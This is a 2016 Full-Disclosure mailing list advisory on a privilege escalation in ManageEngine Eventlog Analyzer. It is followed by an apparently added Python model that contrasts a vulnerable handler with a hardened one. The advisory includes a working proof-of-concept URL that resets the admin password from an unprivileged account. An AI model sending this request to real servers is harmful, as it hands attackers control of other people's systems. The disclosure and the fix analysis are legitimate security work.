lists.openwall.net - Full-Disclosure mailing list archive
Message-ID: <d9c8e7310c019f121ee418f9eaca89f8.webmail@localhost>
Date: Fri, 29 Jan 2016 16:16:56 -0000
From: graphx@...aint.org
Subject: [FD] ManageEngine Eventlog Analyzer v4-v10 Privilege Escalation

# Exploit Title: ManageEngine Eventlog Analyzer Privilege Escalation
# Exploit Author: @GraphX
# Vendor Homepage: http://www.manageengine.com
# Version: 4.0 - 10

1. Description:

The ManageEngine Eventlog Analyzer fails to properly verify user privileges when making changes via userManagementForm.do. An unprivileged user is allowed to make changes to any account by changing the USER_ID field to a number corresponding to another user. Testing discovered that the default admin and guest accounts are 1 and 2.

Considering the recent similar vulnerabilities discovered in a more current version of a similar product by ManageEngine, it is possible that more versions of the software, including current ones, are vulnerable. According to the vendor this is fixed in version 10.8.

2. Proof of Concept:

- Log in as an unprivileged user.
- Use the following URL to change the admin password to "admin":

http://<IP_ADDRESS>/event/userManagementForm.do?addField=false&action=request.getParameter(&password=admin&email=&USER_ID=1&Submit=Save+User+Details&userName=admin

3. Solution:

Upgrade to 10.8

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
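The flaw described in the post is a missing authorization check on a client-controlled object reference: the handler trusts the USER_ID parameter instead of deciding from the session who may edit whom. The following is an added example, not code from the advisory or from ManageEngine. It models that handler shape in Python: it parses the parameters out of the posted PoC URL (with 192.0.2.10 standing in for <IP_ADDRESS>), applies them once through a handler that trusts USER_ID and once through a handler that checks the session's role and identity first. The user table, the session structure and the role names are constructed assumptions for illustration; only the parameter names and the observation that admin and guest are IDs 1 and 2 come from the post.

```python
"""Model of the userManagementForm.do authorization flaw (added example).

Assumptions, not taken from the advisory or the product: the in-memory user
table, the Session class, the role names and the handler signatures.
"""
import copy
from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit

# Constructed user table. IDs 1 and 2 mirror the post's observation that the
# default admin and guest accounts carry those numbers; ID 3 is the attacker's
# own unprivileged account.
USERS = {
    1: {"userName": "admin", "password": "s3cret-admin", "role": "admin"},
    2: {"userName": "guest", "password": "guest", "role": "guest"},
    3: {"userName": "lowpriv", "password": "lowpriv", "role": "operator"},
}

# The PoC URL from the post, with 192.0.2.10 (TEST-NET-1) as a placeholder host.
POC_URL = (
    "http://192.0.2.10/event/userManagementForm.do?addField=false"
    "&action=request.getParameter(&password=admin&email=&USER_ID=1"
    "&Submit=Save+User+Details&userName=admin"
)


@dataclass
class Session:
    """Who the server actually authenticated; never derived from the request body."""
    user_id: int
    role: str


class Forbidden(Exception):
    pass


def params_from_poc_url(url: str) -> dict:
    """Flatten the query string into a single-valued dict (empty values kept)."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {key: values[0] for key, values in query.items()}


def vulnerable_save_user(session: Session, params: dict, users: dict) -> int:
    """Behaviour the post describes: USER_ID from the client is trusted outright,
    so any authenticated user can overwrite any account's name and password."""
    target = int(params["USER_ID"])
    users[target]["userName"] = params["userName"]
    users[target]["password"] = params["password"]
    return target


def can_modify(session: Session, target: int) -> bool:
    """Authorization rule: admins may edit anyone, everyone else only themselves."""
    return session.role == "admin" or target == session.user_id


def hardened_save_user(session: Session, params: dict, users: dict) -> int:
    """Same write, but the decision is made from the session, not the form field."""
    target = int(params["USER_ID"])
    if target not in users:
        raise KeyError(target)
    if not can_modify(session, target):
        raise Forbidden(f"user {session.user_id} may not modify user {target}")
    users[target]["userName"] = params["userName"]
    users[target]["password"] = params["password"]
    return target


def demo() -> tuple:
    """Replay the PoC parameters as the unprivileged user against both handlers.

    Returns (admin password after vulnerable handler,
             admin password after hardened handler,
             whether the hardened handler refused the request)."""
    params = params_from_poc_url(POC_URL)
    attacker = Session(user_id=3, role="operator")

    vuln_users = copy.deepcopy(USERS)
    vulnerable_save_user(attacker, params, vuln_users)

    hard_users = copy.deepcopy(USERS)
    try:
        hardened_save_user(attacker, params, hard_users)
        refused = False
    except Forbidden:
        refused = True

    return vuln_users[1]["password"], hard_users[1]["password"], refused


if __name__ == "__main__":
    print(demo())  # vulnerable: admin password becomes "admin"; hardened: unchanged, refused
```

The fix is not to hide or validate the USER_ID field better; the target must be checked against the authenticated principal on the server for every write, exactly as `hardened_save_user` does before touching the table.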